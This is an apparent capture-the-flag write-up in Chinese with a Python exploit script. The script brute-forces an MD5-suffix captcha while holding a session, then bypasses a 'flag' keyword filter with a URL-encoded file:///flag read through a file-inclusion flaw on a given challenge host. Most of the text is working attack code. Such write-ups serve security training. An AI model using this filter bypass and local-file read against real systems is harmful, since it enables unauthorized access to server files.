题目要求:
输入MD5值后6位为xxx的验证码,
同时这里的URL存在大概是文件包含的漏洞,过滤了flag,可通过burp来url加密绕过
这里exp的重点是维持会话
import requests
import re
import hashlib
session = requests.Session()
response1=session.get('http://61.147.171.105:60185/index.php')
matchs=re.finditer(r'== "([a-z0-9A-z]+)"',response1.text)
for match in matchs:
s = '0' #验证码
while True :
s_md5 = hashlib.md5(s.encode('utf-8')).hexdigest()
if s_md5[-6:]== match.group(1) :
data = {
'url': 'file:///%66%6c%61%67', #/flag
'captcha': s #验证码
}
response2 = session.post('http://61.147.171.105:60185/index.php', data=data)
print(response2.text)
exit()
s=str(int(s)+1)